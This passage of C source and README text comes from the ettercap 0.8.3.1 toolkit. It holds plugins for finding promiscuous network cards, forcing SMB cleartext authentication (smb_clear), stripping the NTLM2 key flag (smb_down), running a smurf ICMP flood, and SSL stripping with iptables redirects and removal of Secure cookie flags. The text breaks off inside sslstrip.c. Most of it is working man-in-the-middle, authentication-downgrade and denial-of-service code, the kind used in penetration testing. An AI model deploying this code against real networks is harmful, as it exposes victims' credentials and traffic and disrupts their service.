59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* globals */ LIST_HEAD(, hosts_list) promisc_table; LIST_HEAD(, hosts_list) collected_table; /* mutexes */ static pthread_mutex_t search_promisc_mutex = PTHREAD_MUTEX_INITIALIZER; /* protos */ int plugin_load(void *); static int search_promisc_init(void *); static EC_THREAD_FUNC(search_promisc_thread); static int search_promisc_fini(void *); static void parse_arp(struct packet_object *po); /* plugin operations */ struct plugin_ops search_promisc_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "search_promisc", /* a short description of the plugin (max 50 chars) */ .info = "Search promisc NICs in the LAN", /* the plugin version. */ .version = "1.2", /* activation function */ .init = &search_promisc_init, /* deactivation function */ .fini = &search_promisc_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &search_promisc_ops); } /******************* STANDARD FUNCTIONS *******************/ static int search_promisc_init(void *dummy) { /* variable not used */ (void) dummy; ec_thread_new("search_promisc", "plugin search_promisc", &search_promisc_thread, NULL); return PLUGIN_RUNNING; } static EC_THREAD_FUNC(search_promisc_thread) { /* variable not used */ (void) EC_THREAD_PARAM; char tmp[MAX_ASCII_ADDR_LEN]; struct hosts_list *h; u_char bogus_mac[2][6]={"\xfd\xfd\x00\x00\x00\x00", "\xff\xff\x00\x00\x00\x00"}; char messages[2][48]={"\nLess probably sniffing NICs:\n", "\nMost probably sniffing NICs:\n"}; u_char i; ec_thread_init(); PLUGIN_LOCK(search_promisc_mutex); /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("search_promisc: plugin doesn't work in UNOFFENSIVE mode.\n\n"); PLUGIN_UNLOCK(search_promisc_mutex); plugin_kill_thread("search_promisc", "search_promisc"); return PLUGIN_FINISHED; } if (LIST_EMPTY(&EC_GBL_HOSTLIST)) { INSTANT_USER_MSG("search_promisc: You have to build host-list to run this plugin.\n\n"); PLUGIN_UNLOCK(search_promisc_mutex); plugin_kill_thread("search_promisc", "search_promisc"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("search_promisc: Searching promisc NICs...\n"); /* We have to perform same operations twice :) */ for (i=0; i<=1; i++) { /* Add the hook to collect ARP replies from the targets */ hook_add(HOOK_PACKET_ARP_RP, &parse_arp); /* Send malformed ARP requests to each target. * First and second time we'll use different * dest mac addresses */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { send_arp(ARPOP_REQUEST, &EC_GBL_IFACE->ip, EC_GBL_IFACE->mac, &h->ip, bogus_mac[i]); ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } /* Wait for responses */ ec_usleep(SEC2MICRO(1)); /* Remove the hook */ hook_del(HOOK_PACKET_ARP_RP, &parse_arp); /* Print results */ INSTANT_USER_MSG(messages[i]); if(LIST_EMPTY(&promisc_table)) INSTANT_USER_MSG("- NONE \n"); else LIST_FOREACH(h, &promisc_table, next) INSTANT_USER_MSG("- %s\n",ip_addr_ntoa(&h->ip, tmp)); /* Delete the list */ while (!LIST_EMPTY(&promisc_table)) { h = LIST_FIRST(&promisc_table); LIST_REMOVE(h, next); SAFE_FREE(h); } } /* Delete the list */ while (!LIST_EMPTY(&collected_table)) { h = LIST_FIRST(&collected_table); LIST_REMOVE(h, next); SAFE_FREE(h); } PLUGIN_UNLOCK(search_promisc_mutex); plugin_kill_thread("search_promisc", "search_promisc"); return PLUGIN_FINISHED; } static int search_promisc_fini(void *dummy) { /* variable not used */ (void) dummy; pthread_t pid; pid = ec_thread_getpid("search_promisc"); if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("search_promisc: plugin terminated...\n"); return PLUGIN_FINISHED; } /*********************************************************/ /* Parse the reply to our bougs requests */ static void parse_arp(struct packet_object *po) { struct hosts_list *h; /* We'll parse only replies for us */ if (memcmp(po->L2.dst, EC_GBL_IFACE->mac, MEDIA_ADDR_LEN)) return; /* Check if it's already in the list */ LIST_FOREACH(h, &collected_table, next) if (!ip_addr_cmp(&(po->L3.src), &h->ip)) { return; } /* create the element and insert it in the two lists */ SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &(po->L3.src), sizeof(struct ip_addr)); LIST_INSERT_HEAD(&promisc_table, h, next); SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &(po->L3.src), sizeof(struct ip_addr)); LIST_INSERT_HEAD(&collected_table, h, next); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/smb_clear/000775 000000 000000 00000000000 13711276346 017147 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/smb_clear/smb_clear.c000664 000000 000000 00000007630 13711276346 021250 0ustar00rootroot000000 000000 /* smb_clear -- ettercap plugin -- Tries to force SMB cleartext auth. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include typedef struct { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; } SMB_header; typedef struct { u_char mesg; u_char flags; u_short len; } NetBIOS_header; /* protos */ int plugin_load(void *); static int smb_clear_init(void *); static int smb_clear_fini(void *); static void parse_smb(struct packet_object *po); /* plugin operations */ struct plugin_ops smb_clear_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "smb_clear", /* a short description of the plugin (max 50 chars) */ .info = "Tries to force SMB cleartext auth", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &smb_clear_init, /* deactivation function */ .fini = &smb_clear_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &smb_clear_ops); } /******************* STANDARD FUNCTIONS *******************/ static int smb_clear_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("smb_clear: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("smb_clear: plugin running...\n"); hook_add(HOOK_PROTO_SMB, &parse_smb); return PLUGIN_RUNNING; } static int smb_clear_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("smb_clear: plugin terminated...\n"); hook_del(HOOK_PROTO_SMB, &parse_smb); return PLUGIN_FINISHED; } /*********************************************************/ /* Clear the encryption bit in the SecurityModel request */ static void parse_smb(struct packet_object *po) { SMB_header *smb; NetBIOS_header *NetBIOS; u_char *ptr; char tmp[MAX_ASCII_ADDR_LEN]; /* It is pointless to modify packets that won't be forwarded */ if (!(po->flags & PO_FORWARDABLE)) return; /* Catch netbios and smb headers */ NetBIOS = (NetBIOS_header *)po->DATA.data; smb = (SMB_header *)(NetBIOS + 1); /* Let's go to the data */ ptr = (u_char *)(smb + 1); /* According to the Hook Point we are sure that this is * a NegotiateProtocol response packet. * Now we can change the Security Mode * 010 (encrypted) 000 (plaintext) */ if (ptr[3] & 2) { ptr[3] ^= 2; USER_MSG("smb_clear: Forced SMB clear text auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); po->flags |= PO_MODIFIED; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/smb_down/000775 000000 000000 00000000000 13711276346 017030 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/smb_down/smb_down.c000664 000000 000000 00000010341 13711276346 021003 0ustar00rootroot000000 000000 /* smb_down -- ettercap plugin -- Tries to force no NTLM2 key Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include typedef struct { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; } SMB_header; typedef struct { u_char mesg; u_char flags; u_short len; } NetBIOS_header; #define NTLM2_KEY 0x00000800 /* protos */ int plugin_load(void *); static int smb_down_init(void *); static int smb_down_fini(void *); static void parse_smb(struct packet_object *po); /* plugin operations */ struct plugin_ops smb_down_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "smb_down", /* a short description of the plugin (max 50 chars) */ .info = "Tries to force SMB to not use NTLM2 key auth", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &smb_down_init, /* deactivation function */ .fini = &smb_down_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &smb_down_ops); } /******************* STANDARD FUNCTIONS *******************/ static int smb_down_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("smb_down: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("smb_down: plugin running...\n"); hook_add(HOOK_PROTO_SMB_CHL, &parse_smb); return PLUGIN_RUNNING; } static int smb_down_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("smb_down: plugin terminated...\n"); hook_del(HOOK_PROTO_SMB_CHL, &parse_smb); return PLUGIN_FINISHED; } /*********************************************************/ /* Clear the encryption bit in the SecurityModel request */ static void parse_smb(struct packet_object *po) { SMB_header *smb; NetBIOS_header *NetBIOS; u_char *ptr; u_int32 *Flags; char tmp[MAX_ASCII_ADDR_LEN]; /* It is pointless to modify packets that won't be forwarded */ if (!(po->flags & PO_FORWARDABLE)) return; /* Catch netbios and smb headers */ NetBIOS = (NetBIOS_header *)po->DATA.data; smb = (SMB_header *)(NetBIOS + 1); /* Let's go to the data */ ptr = (u_char *)(smb + 1); /* According to the Hook Point we are sure that this is * a SessionSetup request packet. * Let's check if it's NTLMSSP_NEGOTIATE */ ptr += ( (*ptr) * 2 + 3 ); if ( (ptr = memmem(ptr, 128, "NTLMSSP", 8)) == NULL) return; ptr = (u_char*)strchr((char*)ptr, 0); ptr++; /* NTLMSSP_NEGOTIATE */ if (*ptr != 1) return; ptr+=4; /* Catch the flags */ Flags = (u_int32 *)ptr; if (*Flags & ntohl(NTLM2_KEY)) { *Flags ^= ntohl(NTLM2_KEY); USER_MSG("smb_down: Forced no NTLM2 key %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); po->flags |= PO_MODIFIED; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/smurf_attack/000775 000000 000000 00000000000 13711276346 017703 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/smurf_attack/smurf_attack.c000664 000000 000000 00000007235 13711276346 022541 0ustar00rootroot000000 000000 /* * the smurf attack plugin for ettercap * * XXX - attack against IPv4 hosts is broken by some kernel bug * on some systems as the kernel amends the source ip address */ #include #include #include #include #include #include /* protos */ int plugin_load(void *); static int smurf_attack_init(void *); static int smurf_attack_fini(void *); static EC_THREAD_FUNC(smurfer); /* globals */ struct plugin_ops smurf_attack_ops = { .ettercap_version = EC_VERSION, .name = "smurf_attack", .info = "Run a smurf attack against specified hosts", .version = "1.0", .init = &smurf_attack_init, .fini = &smurf_attack_fini, }; /* teh c0d3 */ int plugin_load(void *handle) { return plugin_register(handle, &smurf_attack_ops); } static int smurf_attack_init(void *dummy) { struct ip_list *i; /* variable not used */ (void) dummy; DEBUG_MSG("smurf_attack_init"); if(EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("smurf_attack: plugin doesn't work in unoffensive mode\n"); return PLUGIN_FINISHED; } if(EC_GBL_TARGET1->all_ip && EC_GBL_TARGET1->all_ip6) { USER_MSG("Add at least one host to target one list.\n"); return PLUGIN_FINISHED; } if(EC_GBL_TARGET2->all_ip && EC_GBL_TARGET2->all_ip6 && LIST_EMPTY(&EC_GBL_HOSTLIST)) { USER_MSG("Target two and global hostlist are empty.\n"); return PLUGIN_FINISHED; } EC_GBL_OPTIONS->quiet = 1; INSTANT_USER_MSG("smurf_attack: starting smurf attack against the target one hosts\n"); /* creating a thread per target */ LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { ec_thread_new("smurfer", "thread performing a smurf attack", &smurfer, &i->ip); } /* same for IPv6 targets */ LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) { ec_thread_new("smurfer", "thread performing a smurf attack", &smurfer, &i->ip); } return PLUGIN_RUNNING; } static int smurf_attack_fini(void *dummy) { pthread_t pid; /* variable not used */ (void) dummy; DEBUG_MSG("smurf_attack_fini"); while(!pthread_equal(ec_thread_getpid(NULL), pid = ec_thread_getpid("smurfer"))) { ec_thread_destroy(pid); } return PLUGIN_FINISHED; } static EC_THREAD_FUNC(smurfer) { struct ip_addr *ip; struct ip_list *i, *itmp; struct hosts_list *h, *htmp; LIST_HEAD(ip_list_t, ip_list) *ips = NULL; u_int16 proto; int (*icmp_send)(struct ip_addr*, struct ip_addr*); DEBUG_MSG("smurfer"); ec_thread_init(); ip = EC_THREAD_PARAM; proto = ntohs(ip->addr_type); /* some pointer magic here. nothing difficult */ switch(proto) { case AF_INET: icmp_send = send_L3_icmp_echo; ips = (struct ip_list_t *)&EC_GBL_TARGET2->ips; break; #ifdef WITH_IPV6 case AF_INET6: icmp_send = send_L3_icmp6_echo; ips = (struct ip_list_t *)&EC_GBL_TARGET2->ip6; break; #endif default: /* This won't ever be reached * if no other network layer protocol * is added. */ ec_thread_destroy(ec_thread_getpid(NULL)); break; } LOOP { CANCELLATION_POINT(); /* if target two list is not empty using it */ if(!LIST_EMPTY(ips)) LIST_FOREACH_SAFE(i, ips, next, itmp) icmp_send(ip, &i->ip); /* else using global hostlist */ else LIST_FOREACH_SAFE(h, &EC_GBL_HOSTLIST, next, htmp) if(ntohs(h->ip.addr_type) == proto) icmp_send(ip, &h->ip); ec_usleep(1000*1000/EC_GBL_CONF->sampling_rate); } return NULL; } ettercap-0.8.3.1/plug-ins/sslstrip/000775 000000 000000 00000000000 13711276346 017103 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/sslstrip/README.SSLSTRIP000664 000000 000000 00000004716 13711276346 021255 0ustar00rootroot000000 000000 Documentation for SSLStrip plugin for ettercap 0.7.5+ SSLStrip: --------- SSLStrip is a python script written by Moxie (http://www.thoughtcrime.org/software/sslstrip/) that basically strips all the https:// links from HTML respones so that users will submit everything via HTTP. The script keeps track of those HTTPS links so that it can talk to the actual web server via the right application protocol (HTTP or HTTPS). SSLStrip depends on ARPspoof and IPTables forwarding to intercept the victim(s)' traffic. Why add it to Ettercap? ----------------------- Ettercap already performs the MiTM approach that ARPspoof does. It was very simple to write this as a plugin and allow the plugin to redirect HTTP (port 80) traffic to itself in order to perform the requests on behalf of the victim(s). Just as the script, the SSLStrip plugin keeps track of all HTTPS links so that it can go ahead and send those requests via HTTPS to the actual web server(s). It then strips all HTTPS links from the responses so that everything coming from the victim(s) is seen as HTTP, therefor, unencrypted. How to get it to work: ---------------------- In order for the plugin to compile, you must install libcurl. This can be done via your operating system's package management. It needs versision 7.26.0 at least. On Mac OS X: Mac OS X already comes with libcurl installed but it is an older version. Please use/run the MacPorts version of it by typing: $ port install curl On Linux: Just installing the latest version of libcurl/curl will do. How to use? ----------- Enabling the SSLStrip plugin will add an IPTables/IPFW rule that redirects traffic to port 80 to a different port that the plugin will be listening on. Although not required, it is recommended if SSL MiTM (-S) is turned off to avoid any issues with the traffic coming from Ettercap to the web server via HTTPS. If the targets lists are properly defined, SSL MiTM can also be used in conjunction of SSLStrip plugin just in case any HTTPS link slips by. Known Problems ------------- The regex pattern used by the plugin picks up most HTTPS links but there are still some that will slip by. For example if a link has href="/aslfksldfkjdflkjasdfj/******RANDOMTEXT", the plugin will fail to match that. Improvements? ------------- Sure! If a better regex pattern can be used, any bugs, crashes, etc. Feel free to submit to the mailing list or email us directly (see AUTHORS file). Thanks, exfil (emescobar@users.sf.net). ettercap-0.8.3.1/plug-ins/sslstrip/sslstrip.c000664 000000 000000 00000120264 13711276346 021137 0ustar00rootroot000000 000000 /* sslstrip -- ettercap plugin -- SSL Strip per Moxie (http://www.thoughtcrime.org/software/sslstrip/) Copyright (C) Ettercap Development Team. 2012. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef HAVE_STRNDUP #include #endif #ifdef OS_LINUX #include #endif #if defined OS_LINUX && defined WITH_IPV6 #include #endif #ifdef HAVE_SYS_POLL_H #include #endif #include #if (LIBCURL_VERSION_MAJOR < 7) || (LIBCURL_VERSION_MINOR < 26) #error libcurl 7.26.0 or up is needed #endif /* * This plugin will basically replace all https links sent to the user's browser with http * but keep track of those https links to send a proper HTTPS request to the links when requested. */ #if defined(OS_DARWIN) || defined(OS_BSD) #define SSLSTRIP_SET "21" #endif //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)://([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)" //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)(\\%3A|\\%3a|:)//([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)" #define URL_PATTERN "(https://[\\w\\d:#@%/;$()~_?\\+=\\\\.&-]*)" //#define COOKIE_PATTERN "Set-Cookie: (.*?;)(.?Secure;|.?Secure)(.*?)\r\n" #define COOKIE_PATTERN "Set-Cookie: ([ \\w\\d:#@%/;$()~_?\\+=\\\\.&-]+); ?Secure" #define REQUEST_TIMEOUT 120 /* If a request has not been used in 120 seconds, remove it from list */ #define HTTP_RETRY 500 #define HTTP_WAIT 10 /* milliseconds */ #define PROTO_HTTP 1 #define PROTO_HTTPS 2 #define HTTP_GET (1<<16) #define HTTP_POST (1<<24) #define HTTP_MAX (1024*200) //200KB max for HTTP requests. #define BREAK_ON_ERROR(x,y,z) do { \ if (x == -E_INVALID ) { \ http_wipe_connection(y); \ SAFE_FREE(z.DATA.data); \ SAFE_FREE(z.DATA.disp_data); \ ec_thread_exit(); \ } \ } while(0) /* lists */ struct http_ident { u_int32 magic; #define HTTP_MAGIC 0x0501e77f struct ip_addr L3_src; u_int16 L4_src; u_int16 L4_dst; }; #define HTTP_IDENT_LEN sizeof(struct http_ident) struct https_link { char *url; time_t last_used; LIST_ENTRY (https_link) next; }; struct http_request { int method; struct curl_slist *headers; char *url; char *payload; }; struct http_response { char *html; unsigned long int len; }; struct http_connection { int fd; u_int16 port[2]; struct ip_addr ip[2]; CURL *handle; struct http_request *request; struct http_response *response; char curl_err_buffer[CURL_ERROR_SIZE]; #define HTTP_CLIENT 0 #define HTTP_SERVER 1 }; LIST_HEAD(, https_link) https_links; static pthread_mutex_t list_mutex = PTHREAD_MUTEX_INITIALIZER; #define LIST_LOCK do{ pthread_mutex_lock(&list_mutex); } while(0) #define LIST_UNLOCK do{ pthread_mutex_unlock(&list_mutex); } while(0) /* globals */ static int main_fd, main_fd6; static struct pollfd poll_fd[2]; static u_int16 bind_port; static pcre *https_url_pcre; static regex_t find_cookie_re; /* protos */ int plugin_load(void *); static int sslstrip_init(void *); static int sslstrip_fini(void *); static void sslstrip(struct packet_object *po); static int sslstrip_is_http(struct packet_object *po); #ifndef OS_LINUX static void sslstrip_create_session(struct ec_session **s, struct packet_object *po); static int sslstrip_match(void *id_sess, void *id_curr); static size_t http_create_ident(void **i, struct packet_object *po); #endif /* http stuff */ static void Find_Url(u_char *to_parse, char **ret); static int http_sync_conn(struct http_connection *connection); static int http_get_peer(struct http_connection *connection); static int http_read(struct http_connection *connection, struct packet_object *po); static int http_write(int fd, char *ptr, unsigned long int total_len); static void http_remove_header(char *header, struct http_connection *connection); static void http_update_content_length(struct http_connection *connection); static void http_initialize_po(struct packet_object *po, u_char *p_data, size_t len); static void http_parse_packet(struct http_connection *connection, int direction, struct packet_object *po); static void http_wipe_connection(struct http_connection *connection); static void http_handle_request(struct http_connection *connection, struct packet_object *po); static void http_send(struct http_connection *connection, struct packet_object *po, int proto); static void http_remove_https(struct http_connection *connection); static void http_remove_secure_from_cookie(struct http_connection *connection); static u_int http_receive_from_server(char *ptr, size_t size, size_t nmemb, void *userdata); //static size_t http_write_to_server(void *ptr, size_t size, size_t nmemb, void *stream); /* thread stuff */ static int http_bind_wrapper(void); static EC_THREAD_FUNC(http_child_thread); static EC_THREAD_FUNC(http_accept_thread); /* * Custom flag used by plugin to mark packets coming * from this plugin */ #define PO_FROMSSLSTRIP ((u_int16)(1<<13)) struct plugin_ops sslstrip_ops = { .ettercap_version = EC_VERSION, /* must match global EC_VERSION */ .name = "sslstrip", .info = "SSLStrip plugin", .version = "1.2", .init = &sslstrip_init, .fini = &sslstrip_fini, }; int plugin_load(void *handle) { return plugin_register(handle, &sslstrip_ops); } static int sslstrip_init(void *dummy) { const char *error; int erroroffset; int err; char errbuf[100]; /* variable not used */ (void) dummy; /* * Add IPTables redirect for port 80 */ if (http_bind_wrapper() != E_SUCCESS) { USER_MSG("SSLStrip: plugin load failed: Could not set up HTTP redirect\n"); return PLUGIN_FINISHED; } https_url_pcre = pcre_compile(URL_PATTERN, PCRE_MULTILINE|PCRE_CASELESS, &error, &erroroffset, NULL); if (!https_url_pcre) { USER_MSG("SSLStrip: plugin load failed: pcre_compile failed (offset: %d), %s\n", erroroffset, error); ec_redirect(EC_REDIR_ACTION_REMOVE, "http", EC_REDIR_PROTO_IPV4, NULL, 80, bind_port); #ifdef WITH_IPV6 ec_redirect(EC_REDIR_ACTION_REMOVE, "http", EC_REDIR_PROTO_IPV6, NULL, 80, bind_port); #endif return PLUGIN_FINISHED; } err = regcomp(&find_cookie_re, COOKIE_PATTERN, REG_EXTENDED | REG_NEWLINE | REG_ICASE); if (err) { regerror(err, &find_cookie_re, errbuf, sizeof(errbuf)); USER_MSG("SSLStrip: plugin load failed: Could not compile find_cookie regex: %s (%d)\n", errbuf, err); pcre_free(https_url_pcre); ec_redirect(EC_REDIR_ACTION_REMOVE, "http" , EC_REDIR_PROTO_IPV4, NULL, 80, bind_port); #ifdef WITH_IPV6 ec_redirect(EC_REDIR_ACTION_REMOVE, "http" , EC_REDIR_PROTO_IPV6, NULL, 80, bind_port); #endif return PLUGIN_FINISHED; } hook_add(HOOK_HANDLED, &sslstrip); /* start HTTP accept thread */ ec_thread_new_detached("http_accept_thread", "HTTP Accept thread", &http_accept_thread, NULL, 1); USER_MSG("SSLStrip Plugin version 1.2 is still under experimental mode. Please reports any issues to the development team.\n"); return PLUGIN_RUNNING; } static int sslstrip_fini(void *dummy) { /* variable not used */ (void) dummy; DEBUG_MSG("SSLStrip: Removing redirect\n"); if (ec_redirect(EC_REDIR_ACTION_REMOVE, "http", EC_REDIR_PROTO_IPV4, NULL, 80, bind_port) != E_SUCCESS) { USER_MSG("SSLStrip: Unable to remove HTTP redirect, please do so " "manually.\n"); } #ifdef WITH_IPV6 if (ec_redirect(EC_REDIR_ACTION_REMOVE, "http", EC_REDIR_PROTO_IPV6, NULL, 80, bind_port) != E_SUCCESS) { USER_MSG("SSLStrip: Unable to remove HTTP redirect, please do so " "manually.\n"); } #endif // Free regexes. if (https_url_pcre) pcre_free(https_url_pcre); regfree(&find_cookie_re); /* stop accept wrapper */ pthread_t pid = ec_thread_getpid("http_accept_thread"); if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); /* now destroy all http_child_thread */ do { pid = ec_thread_getpid("http_child_thread"); if(!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); } while (!pthread_equal(pid, ec_thread_getpid(NULL))); close(main_fd); #ifdef WITH_IPV6 close(main_fd6); #endif /* Remove hook point */ hook_del(HOOK_HANDLED, &sslstrip); return PLUGIN_FINISHED; } static int sslstrip_is_http(struct packet_object *po) { /* if already coming from SSLStrip or proto is not TCP */ if (po->flags & PO_FROMSSLSTRIP || po->L4.proto != NL_TYPE_TCP) return 0; if (ntohs(po->L4.dst) == 80 || ntohs(po->L4.src) == 80) return 1; if (strstr((const char*)po->DATA.data, "HTTP/1.1") || strstr((const char*)po->DATA.data, "HTTP/1.0")) return 1; return 0; } #ifndef OS_LINUX static int sslstrip_match(void *id_sess, void *id_curr) { struct http_ident *ids = id_sess; struct http_ident *id = id_curr; /* sanity checks */ BUG_IF(ids == NULL); BUG_IF(id == NULL); /* check magic */ if (ids->magic != id->magic) return 0; if (ids->L4_src == id->L4_src && ids->L4_dst == id->L4_dst && !ip_addr_cmp(&ids->L3_src, &id->L3_src)) return 1; return 0; } static void sslstrip_create_session(struct ec_session **s, struct packet_object *po) { void *ident; DEBUG_MSG("sslstrip_create_session"); /* allocate the session */ SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); /* create the ident */ (*s)->ident_len = http_create_ident(&ident, po); /* link to the session */ (*s)->ident = ident; /* the matching function */ (*s)->match = sslstrip_match; /* alloc of data elements */ SAFE_CALLOC((*s)->data, 1, sizeof(struct ip_addr)); } #endif /* * Filter HTTP related packets and create NAT sessions */ static void sslstrip(struct packet_object *po) { if (!sslstrip_is_http(po)) return; /* If it's an HTTP packet, don't forward it */ po->flags |= PO_DROPPED; if ( (po->flags & PO_FORWARDABLE) && (po->L4.flags & TH_SYN) && !(po->L4.flags & TH_ACK) ) { #ifndef OS_LINUX struct ec_session *s = NULL; sslstrip_create_session(&s, PACKET); memcpy(s->data, &po->L3.dst, sizeof(struct ip_addr)); session_put(s); #endif } else { po->flags |= PO_IGNORE; } } /* Unescape the string */ static void Decode_Url(u_char *src) { u_char t[3]; u_int32 i, j, ch; /* Paranoid test */ if (!src) return; /* NULL terminate for the strtoul */ t[2] = 0; for (i=0, j=0; src[i] != 0; i++, j++) { ch = (u_int32)src[i]; if (ch == '%' && isxdigit((u_int32)src[i + 1]) && isxdigit((u_int32)src[i + 2])) { memcpy(t, src+i+1, 2); ch = strtoul((char *)t, NULL, 16); i += 2; } src[j] = (u_char)ch; } src[j] = 0; } /* Gets the URL from the request */ static void Find_Url(u_char *to_parse, char **ret) { u_char *fromhere, *page=NULL, *host=NULL; u_int32 len; char *tok; if (!strncmp((char *)to_parse, "GET ", 4)) to_parse += strlen("GET "); else if (!strncmp((char *)to_parse, "POST ", 5)) to_parse += strlen("POST "); else return; /* Get the page from the request */ page = (u_char *)strdup((char *)to_parse); if(page == NULL) { USER_MSG("SSLStrip: Find_Url: page is NULL\n"); return; } ec_strtok((char *)page, " HTTP", &tok); /* If the path is relative, search for the Host */ if ((*page=='/') && (fromhere = (u_char *)strstr((char *)to_parse, "Host: "))) { host = (u_char *)strdup( (char *)fromhere + strlen("Host: ") ); if(host == NULL) { USER_MSG("SSLStrip: Find_Url: host is NULL\n"); return; } ec_strtok((char *)host, "\r", &tok); } else { host = (u_char*)strdup(""); if(host == NULL) { USER_MSG("SSLStrip: Find_Url: relative path, but host is NULL\n"); return; } } len = strlen((char *)page) + strlen((char *)host) + 2; SAFE_CALLOC(*ret, len, sizeof(char)); snprintf(*ret, len, "%s%s", host, page); SAFE_FREE(page); SAFE_FREE(host); Decode_Url((u_char *)*ret); } static EC_THREAD_FUNC(http_accept_thread) { struct http_connection *connection; struct sockaddr_storage client_ss; u_int len = sizeof(client_ss); int optval = 1, fd = 0, nfds = 1; socklen_t optlen = sizeof(optval); struct sockaddr *sa; struct sockaddr_in *sa4; #ifdef WITH_IPV6 struct sockaddr_in6 *sa6; #endif /* variable not used */ (void) EC_THREAD_PARAM; ec_thread_init(); DEBUG_MSG("SSLStrip: http_accept_thread initialized and ready"); poll_fd[0].fd = main_fd; poll_fd[0].events = POLLIN; #ifdef WITH_IPV6 poll_fd[1].fd = main_fd6; poll_fd[1].events = POLLIN; nfds++; #endif LOOP { /* wait until one file descriptor becomes active */ poll(poll_fd, nfds, -1); /* check which file descriptor became active */ if (poll_fd[0].revents & POLLIN) fd = poll_fd[0].fd; #ifdef WITH_IPV6 else if (poll_fd[1].revents & POLLIN) fd = poll_fd[1].fd; #endif else continue; /* accept incoming connection */ SAFE_CALLOC(connection, 1, sizeof(struct http_connection)); BUG_IF(connection==NULL); SAFE_CALLOC(connection->request, 1, sizeof(struct http_request)); BUG_IF(connection->request==NULL); SAFE_CALLOC(connection->response, 1, sizeof(struct http_response)); BUG_IF(connection->response==NULL); connection->fd = accept(fd, (struct sockaddr *)&client_ss, &len); 